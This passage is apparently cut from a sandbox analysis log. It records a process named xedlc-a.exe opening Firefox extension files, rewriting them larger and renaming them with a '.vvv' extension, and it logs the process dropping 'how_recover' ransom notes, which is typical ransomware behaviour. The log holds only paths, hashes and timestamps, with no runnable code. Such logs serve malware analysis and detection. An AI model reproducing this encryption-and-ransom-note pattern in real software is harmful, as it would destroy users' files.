55356.          fid (ads:): 562949953476245
55357.          ntstatus: 0x0
55358.          CreateOptions: 0x0
55359.        file:
55360.          timestamp: 83524
55361.          mode: open
55362.          sequenceNumber: 1323
55363.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js
55364.          filesize: 3318
55365.          processinfo:
55366.            pid: 1056
55367.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55368.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55369.            ads:
55370.          fid (ads:): 562949953476263
55371.          ntstatus: 0x0
55372.          CreateOptions: 0x60
55373.        file:
55374.          timestamp: 83646
55375.          mode: close
55376.          sequenceNumber: 1324
55377.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js
55378.          filesize: 3742
55379.          md5sum: 5926888a5e937b28193481ce57dd7707
55380.          sha1sum: f176266a95fb58411e0c94dd0220515537b38ef2
55381.          processinfo:
55382.            pid: 1056
55383.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55384.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55385.            ads:
55386.          fid (ads:): 562949953476263
55387.          ntstatus: 0x0
55388.          CreateOptions: 0x0
55389.        file:
55390.          timestamp: 83660
55391.          mode: rename
55392.          sequenceNumber: 1325
55393.          filesize: 3742
55394.          md5sum: 5926888a5e937b28193481ce57dd7707
55395.          sha1sum: f176266a95fb58411e0c94dd0220515537b38ef2
55396.          processinfo:
55397.            pid: 1056
55398.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55399.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55400.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js
55401.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js.vvv
55402.            ads:
55403.          fid (ads:): 562949953476263
55404.          ntstatus: 0x0
55405.          CreateOptions: 0x0
55406.        file:
55407.          timestamp: 83672
55408.          mode: open
55409.          sequenceNumber: 1326
55410.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js
55411.          filesize: 3099
55412.          processinfo:
55413.            pid: 1056
55414.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55415.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55416.            ads:
55417.          fid (ads:): 281474976765915
55418.          ntstatus: 0x0
55419.          CreateOptions: 0x60
55420.        file:
55421.          timestamp: 83681
55422.          mode: close
55423.          sequenceNumber: 1327
55424.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js
55425.          filesize: 3518
55426.          md5sum: 6a3b3130f0daa44d32b17e58d8b06c5d
55427.          sha1sum: f38909635b22d3234466110c72c8afa3dc115990
55428.          processinfo:
55429.            pid: 1056
55430.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55431.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55432.            ads:
55433.          fid (ads:): 281474976765915
55434.          ntstatus: 0x0
55435.          CreateOptions: 0x0
55436.        file:
55437.          timestamp: 83694
55438.          mode: rename
55439.          sequenceNumber: 1328
55440.          filesize: 3518
55441.          md5sum: 6a3b3130f0daa44d32b17e58d8b06c5d
55442.          sha1sum: f38909635b22d3234466110c72c8afa3dc115990
55443.          processinfo:
55444.            pid: 1056
55445.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55446.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55447.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js
55448.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js.vvv
55449.            ads:
55450.          fid (ads:): 281474976765915
55451.          ntstatus: 0x0
55452.          CreateOptions: 0x0
55453.        file:
55454.          timestamp: 83708
55455.          mode: created
55456.          sequenceNumber: 1329
55457.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.txt
55458.          processinfo:
55459.            pid: 1056
55460.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55461.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55462.            ads:
55463.          fid (ads:): 281474976778355
55464.          ntstatus: 0x0
55465.          CreateOptions: 0x60
55466.        file:
55467.          timestamp: 83715
55468.          mode: close
55469.          sequenceNumber: 1330
55470.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.txt
55471.          filesize: 2682
55472.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
55473.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
55474.          processinfo:
55475.            pid: 1056
55476.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55477.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55478.            ads:
55479.          fid (ads:): 281474976778355
55480.          ntstatus: 0x0
55481.          CreateOptions: 0x0
55482.        file:
55483.          timestamp: 83728
55484.          mode: created
55485.          sequenceNumber: 1331
55486.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.html
55487.          processinfo:
55488.            pid: 1056
55489.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55490.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55491.            ads:
55492.          fid (ads:): 281474976778356
55493.          ntstatus: 0x0
55494.          CreateOptions: 0x60
55495.        file:
55496.          timestamp: 83737
55497.          mode: close
55498.          sequenceNumber: 1332
55499.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.html
55500.          filesize: 9495
55501.          md5sum: 95f596a25dff51b6af2042b1bbe02985
55502.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
55503.          processinfo:
55504.            pid: 1056
55505.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55506.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55507.            ads:
55508.          fid (ads:): 281474976778356
55509.          ntstatus: 0x0
55510.          CreateOptions: 0x0
55511.        file:
55512.          timestamp: 83746
55513.          mode: open
55514.          sequenceNumber: 1333
55515.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js
55516.          filesize: 6368
55517.          processinfo:
55518.            pid: 1056
55519.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55521.            ads:
55522.          fid (ads:): 281474976765909
55523.          ntstatus: 0x0
55524.          CreateOptions: 0x60
55525.        file:
55526.          timestamp: 83790
55527.          mode: close
55528.          sequenceNumber: 1334
55529.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js
55530.          filesize: 6798
55531.          md5sum: f04a88d6800352280b581ce7edf64087
55532.          sha1sum: 4734401189d520801160287ddc001893ce72afc1
55533.          processinfo:
55534.            pid: 1056
55535.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55536.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55537.            ads:
55538.          fid (ads:): 281474976765909
55539.          ntstatus: 0x0
55540.          CreateOptions: 0x0
55541.        file:
55542.          timestamp: 83805
55543.          mode: rename
55544.          sequenceNumber: 1335
55545.          filesize: 6798
55546.          md5sum: f04a88d6800352280b581ce7edf64087
55547.          sha1sum: 4734401189d520801160287ddc001893ce72afc1
55548.          processinfo:
55549.            pid: 1056
55550.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55551.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55552.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js
55553.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js.vvv
55554.            ads:
55555.          fid (ads:): 281474976765909
55556.          ntstatus: 0x0
55557.          CreateOptions: 0x0
55558.        file:
55559.          timestamp: 83820
55560.          mode: open
55561.          sequenceNumber: 1336
55562.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js
55563.          filesize: 2259
55564.          processinfo:
55565.            pid: 1056
55566.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55567.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55568.            ads:
55569.          fid (ads:): 562949953476258
55570.          ntstatus: 0x0
55571.          CreateOptions: 0x60
55572.        file:
55573.          timestamp: 83831
55574.          mode: close
55575.          sequenceNumber: 1337
55576.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js
55577.          filesize: 2686
55578.          md5sum: eee2f8685fce8448e64ba55ccefe2598
55579.          sha1sum: 330b0594fc36e73bfe579c307821b61310502844
55580.          processinfo:
55581.            pid: 1056
55582.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55583.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55584.            ads:
55585.          fid (ads:): 562949953476258
55586.          ntstatus: 0x0
55587.          CreateOptions: 0x0
55588.        file:
55589.          timestamp: 83846
55590.          mode: rename
55591.          sequenceNumber: 1338
55592.          filesize: 2686
55593.          md5sum: eee2f8685fce8448e64ba55ccefe2598
55594.          sha1sum: 330b0594fc36e73bfe579c307821b61310502844
55595.          processinfo:
55596.            pid: 1056
55597.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55598.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55599.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js
55600.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js.vvv
55601.            ads:
55602.          fid (ads:): 562949953476258
55603.          ntstatus: 0x0
55604.          CreateOptions: 0x0
55605.        file:
55606.          timestamp: 83860
55607.          mode: open
55608.          sequenceNumber: 1339
55609.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js
55610.          filesize: 5598
55611.          processinfo:
55612.            pid: 1056
55613.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55614.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55615.            ads:
55616.          fid (ads:): 281474976765896
55617.          ntstatus: 0x0
55618.          CreateOptions: 0x60
55619.        file:
55620.          timestamp: 83881
55621.          mode: close
55622.          sequenceNumber: 1340
55623.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js
55624.          filesize: 6014
55625.          md5sum: 47615eaeda675d2422d565610c2995fd
55626.          sha1sum: 0db4122fdec2bab30996d24ad557272dae5664b1
55627.          processinfo:
55628.            pid: 1056
55629.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55630.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55631.            ads:
55632.          fid (ads:): 281474976765896
55633.          ntstatus: 0x0
55634.          CreateOptions: 0x0
55635.        file:
55636.          timestamp: 83894
55637.          mode: rename
55638.          sequenceNumber: 1341
55639.          filesize: 6014
55640.          md5sum: 47615eaeda675d2422d565610c2995fd
55641.          sha1sum: 0db4122fdec2bab30996d24ad557272dae5664b1
55642.          processinfo:
55643.            pid: 1056
55644.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55646.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js
55647.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js.vvv
55648.            ads:
55649.          fid (ads:): 281474976765896
55650.          ntstatus: 0x0
55651.          CreateOptions: 0x0
55652.        file:
55653.          timestamp: 83906
55654.          mode: open
55655.          sequenceNumber: 1342
55656.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js
55657.          filesize: 3435
55658.          processinfo:
55659.            pid: 1056
55660.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55661.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55662.            ads:
55663.          fid (ads:): 281474976765863
55664.          ntstatus: 0x0
55665.          CreateOptions: 0x60
55666.        file:
55667.          timestamp: 83945
55668.          mode: close
55669.          sequenceNumber: 1343
55670.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js
55671.          filesize: 3854
55672.          md5sum: 9d38c2a0178132c20f0018dbbd121518
55673.          sha1sum: 2c69170584efb3b758aa6b2f5019711dd41d5434
55674.          processinfo:
55675.            pid: 1056
55676.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55677.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55678.            ads:
55679.          fid (ads:): 281474976765863
55680.          ntstatus: 0x0
55681.          CreateOptions: 0x0
55682.        file:
55683.          timestamp: 84024
55684.          mode: rename
55685.          sequenceNumber: 1344
55686.          filesize: 3854
55687.          md5sum: 9d38c2a0178132c20f0018dbbd121518
55688.          sha1sum: 2c69170584efb3b758aa6b2f5019711dd41d5434
55689.          processinfo:
55690.            pid: 1056
55691.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55692.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55693.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js
55694.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js.vvv
55695.            ads:
55696.          fid (ads:): 281474976765863
55697.          ntstatus: 0x0
55698.          CreateOptions: 0x0
55699.        file:
55700.          timestamp: 84038
55701.          mode: open
55702.          sequenceNumber: 1345
55703.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js
55704.          filesize: 7916
55705.          processinfo:
55706.            pid: 1056
55707.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55708.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55709.            ads:
55710.          fid (ads:): 281474976765901
55711.          ntstatus: 0x0
55712.          CreateOptions: 0x60
55713.        file:
55714.          timestamp: 84205
55715.          mode: close
55716.          sequenceNumber: 1346
55717.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js
55718.          filesize: 8334
55719.          md5sum: b0d79b49e72e8a8fe80600af7f07e93e
55720.          sha1sum: 10d5cc4ed82b3a727097d4b486c629d669db93ee
55721.          processinfo:
55722.            pid: 1056
55723.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55724.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55725.            ads:
55726.          fid (ads:): 281474976765901
55727.          ntstatus: 0x0
55728.          CreateOptions: 0x0
55729.        file:
55730.          timestamp: 84218
55731.          mode: rename
55732.          sequenceNumber: 1347
55733.          filesize: 8334
55734.          md5sum: b0d79b49e72e8a8fe80600af7f07e93e
55735.          sha1sum: 10d5cc4ed82b3a727097d4b486c629d669db93ee
55736.          processinfo:
55737.            pid: 1056
55738.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55739.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55740.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js
55741.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js.vvv
55742.            ads:
55743.          fid (ads:): 281474976765901
55744.          ntstatus: 0x0
55745.          CreateOptions: 0x0
55746.        file:
55747.          timestamp: 84233
55748.          mode: created
55749.          sequenceNumber: 1348
55750.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.txt
55751.          processinfo:
55752.            pid: 1056
55753.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55754.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55755.            ads:
55756.          fid (ads:): 281474976778357
55757.          ntstatus: 0x0
55758.          CreateOptions: 0x60
55759.        file:
55760.          timestamp: 84241
55761.          mode: close
55762.          sequenceNumber: 1349
55763.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.txt
55764.          filesize: 2682
55765.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
55766.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
55767.          processinfo:
55768.            pid: 1056
55769.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55771.            ads:
55772.          fid (ads:): 281474976778357
55773.          ntstatus: 0x0
55774.          CreateOptions: 0x0
55775.        file:
55776.          timestamp: 84251
55777.          mode: created
55778.          sequenceNumber: 1350
55779.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.html
55780.          processinfo:
55781.            pid: 1056
55782.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55783.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55784.            ads:
55785.          fid (ads:): 281474976778358
55786.          ntstatus: 0x0
55787.          CreateOptions: 0x60
55788.        file:
55789.          timestamp: 84259
55790.          mode: close
55791.          sequenceNumber: 1351
55792.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.html
55793.          filesize: 9495
55794.          md5sum: 95f596a25dff51b6af2042b1bbe02985
55795.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
55796.          processinfo:
55797.            pid: 1056
55798.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55799.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55800.            ads:
55801.          fid (ads:): 281474976778358
55802.          ntstatus: 0x0
55803.          CreateOptions: 0x0
55804.        file:
55805.          timestamp: 84268
55806.          mode: open
55807.          sequenceNumber: 1352
55808.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js
55809.          filesize: 6332
55810.          processinfo:
55811.            pid: 1056
55812.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55813.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55814.            ads:
55815.          fid (ads:): 281474976765888
55816.          ntstatus: 0x0
55817.          CreateOptions: 0x60
55818.        file:
55819.          timestamp: 84312
55820.          mode: close
55821.          sequenceNumber: 1353
55822.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js
55823.          filesize: 6750
55824.          md5sum: 2f705391b457fa09ce0b6b02c980d294
55825.          sha1sum: 96a21397a639539c8dc5ed5cb2ef58a91fea54c3
55826.          processinfo:
55827.            pid: 1056
55828.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55829.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55830.            ads:
55831.          fid (ads:): 281474976765888
55832.          ntstatus: 0x0
55833.          CreateOptions: 0x0
55834.        file:
55835.          timestamp: 84324
55836.          mode: rename
55837.          sequenceNumber: 1354
55838.          filesize: 6750
55839.          md5sum: 2f705391b457fa09ce0b6b02c980d294
55840.          sha1sum: 96a21397a639539c8dc5ed5cb2ef58a91fea54c3
55841.          processinfo:
55842.            pid: 1056
55843.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55844.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55845.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js
55846.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js.vvv
55847.            ads:
55848.          fid (ads:): 281474976765888
55849.          ntstatus: 0x0
55850.          CreateOptions: 0x0
55851.        file:
55852.          timestamp: 84336
55853.          mode: open
55854.          sequenceNumber: 1355
55855.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js
55856.          filesize: 4999
55857.          processinfo:
55858.            pid: 1056
55859.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55861.            ads:
55862.          fid (ads:): 281474976765905
55863.          ntstatus: 0x0
55864.          CreateOptions: 0x60
55865.        file:
55866.          timestamp: 84468
55867.          mode: close
55868.          sequenceNumber: 1356
55869.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js
55870.          filesize: 5422
55871.          md5sum: 0505f3ee1e0924b22ee22412b053424f
55872.          sha1sum: 192be001cb2cf1b0f68971a21a615f2d5437b560
55873.          processinfo:
55874.            pid: 1056
55875.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55876.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55877.            ads:
55878.          fid (ads:): 281474976765905
55879.          ntstatus: 0x0
55880.          CreateOptions: 0x0
55881.        file:
55882.          timestamp: 84480
55883.          mode: rename
55884.          sequenceNumber: 1357
55885.          filesize: 5422
55886.          md5sum: 0505f3ee1e0924b22ee22412b053424f
55887.          sha1sum: 192be001cb2cf1b0f68971a21a615f2d5437b560
55888.          processinfo:
55889.            pid: 1056
55890.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55891.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55892.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js
55893.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js.vvv
55894.            ads:
55895.          fid (ads:): 281474976765905
55896.          ntstatus: 0x0
55897.          CreateOptions: 0x0
55898.        file:
55899.          timestamp: 84492
55900.          mode: open
55901.          sequenceNumber: 1358
55902.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js
55903.          filesize: 3654
55904.          processinfo:
55905.            pid: 1056
55906.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55907.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55908.            ads:
55909.          fid (ads:): 281474976765904
55910.          ntstatus: 0x0
55911.          CreateOptions: 0x60
55912.        file:
55913.          timestamp: 84543
55914.          mode: close
55915.          sequenceNumber: 1359
